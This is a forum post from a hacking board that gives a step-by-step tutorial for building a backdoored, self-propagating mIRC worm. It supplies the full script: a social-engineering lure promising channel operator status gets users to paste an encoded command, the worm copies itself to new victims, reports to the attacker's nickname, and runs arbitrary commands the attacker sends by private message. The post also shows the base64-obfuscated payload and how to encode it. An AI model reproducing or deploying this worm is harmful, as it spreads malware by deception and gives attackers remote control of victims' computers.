Juggernaut
Membru
 Din: Bucuresti
Inregistrat: acum 18 ani
Postari: 116
|
|
Tutorial mIRC Self-Propagating Script
First of all I need to notice you that this worm is backdoored. This means that people that are infected by this worm can be controlled by you. Once infected with the worm they are also infected with the Trojan. Using the Trojan you can control the victim’s PC.
Get Started
It all starts with the next command:
//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC
4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSA
kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAk
bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvc
GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKy
AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc
This in one line!
Understand the Script
We need to mix these two things:
The Self-Propagating Part
on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }
Here is #mab the channel you want to let them join if they're infected with the worm. But since that would not be very stealth anymore we have to do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.
With this your worm has started, it will now spread, it will try to personal message some people saying something, while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.
This is the original worm I designed. Now we are going to change some things about it so the functionality of the Trojan is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the victim. Once the Trojan is implemented that is not the objective, so we will remove that from the worm. So after this changes we get the next script that we have to merge with the Trojan script:
on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }
The Remote Access (control) Part
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Mixed they will give us the Backdoored IRC Worm. This means that the worm will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it via the Trojan. So you will have the rights to do whatever you want on his/her computer, using mIRC. You actually use the victim’s mIRC to accomplish certain commands. (IRC Trojan) I suggest you visit that webpage and read that tutorial too so you can also fully use the trojan part in the worm.
I will now try to give more details about that script. So you truly understand the worm, so you can easily modify it and achieve better results. I will mix it.
So basically we want to mix these two “mechanismsâ€:
on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
Solution:
on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}
In one line:
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }
Where here is DO SOMETHING the Trojan’s work and DO SOMETHING ELSE the Worm’s work.
Integrated (Two parts joined together):
on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }
Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?
//echo -a $asc(char here)
If this gives a bad result this means that the char must be written in another way.
Example encoding of “,â€:
//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct
Note:
$+ = pasting two strings together
| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)
We have to notice that we don't have to encode that this way, sometimes this method is not needed.
For finding the numbers you use this:
//echo -a $asc($?)
This will pop up an input box, just fill in the char and you’ll get the number as result.
Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:
on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)
So:
//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)
For finding the $encoded variable we split it up as global variables. The variables are set with
/set %var STRING
So for finding it we write the next in mIRC:
//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)
But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.
We find the next as result:
b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKSAmJ
iAoJHRhcmdldCA9PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZi
B9IHwgZWxzZWlmICgoYSogaXN3bSAkMS0pICYmICgkY2hhbikpIHs
gLm1zZyBtYWIgaW5mIHwgLm1zZyAkbmljayBXYW50IHRvIGJlIE9Q
RVJBVE9SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly93c
ml0ZSAuICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3
JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyB
9IH0=
This pasted to each other in one line!
If you want you can modify the worm into your needs. This is the ‘basic’ irc worm script. By modifying it you can accomplish things that satisfy your needs.
_______________________________________
..:: LiteHack ::..
Intra pe http://www.playandwin.ro/?ref=5160 link si castiga tricoul echipei favorite, o pereche de de role plus alte premii.... B) B) B)
|
|
